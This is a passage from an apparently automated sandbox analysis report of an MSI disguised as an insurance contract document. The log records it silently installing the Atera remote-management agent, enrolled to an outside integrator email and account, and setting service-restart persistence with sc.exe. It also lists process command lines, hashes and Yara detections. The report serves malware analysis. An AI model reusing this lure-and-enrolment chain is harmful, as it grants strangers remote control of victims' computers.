                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:12:45:10
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Documento_Contrato_Seguro_25105476.msi"
                                                                                                                                                                                                                                        Imagebase:0x7ff7a5cc0000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:12:45:11
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                        Imagebase:0x7ff7a5cc0000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:12:45:14
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 857E432AFA5D0D205F28F10C61316F91
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:12:45:14
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI2E58.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4468656 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:12:45:15
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI31B4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4469203 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:12:45:20
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI46E3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4474625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:12:45:21
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 81F03F72FE72C18167CE907B2496F3F6 E Global\MSI0000
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:12:45:22
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"NET" STOP AteraAgent
                                                                                                                                                                                                                                        Imagebase:0x270000
                                                                                                                                                                                                                                        File size:47'104 bytes
                                                                                                                                                                                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:12:45:22
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0xdd0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:12:45:22
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                        Imagebase:0x50000
                                                                                                                                                                                                                                        File size:139'776 bytes
                                                                                                                                                                                                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:12:45:22
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                        Imagebase:0x50000
                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:12:45:22
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:12:45:22
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="primepecasuti@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000OgujIIAR" /AgentId="ef8472c8-8ede-4877-a4a2-21e52a229933"
                                                                                                                                                                                                                                        Imagebase:0x16e73870000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1974508605.0000016E739F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1974508605.0000016E739FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1974508605.0000016E73A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E00089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1985587362.00007FFD9B464000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E0008C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1975925687.0000016E760BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1974338755.0000016E739DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E0017C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E000B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E00132000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1974508605.0000016E73A60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1975004017.0000016E73D00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1975925687.0000016E7608C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1975898045.0000016E76050000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1973450620.0000016E000B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1974338755.0000016E739D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:12:45:24
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:12:45:28
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                        Imagebase:0x2befa770000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2523120083.000002BEFAA3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2527805921.000002BEFBE28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2496818468.000000E531CF5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80084000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2529295221.000002BEFBEB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE8016C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2525824499.000002BEFB9C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2522503408.000002BEFA820000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2523120083.000002BEFAA85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2524849992.000002BEFACD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2523120083.000002BEFAA08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE803AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE8036E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2523120083.000002BEFAA00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:12:45:29
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                        Imagebase:0x7ff614260000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:12:45:29
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:19
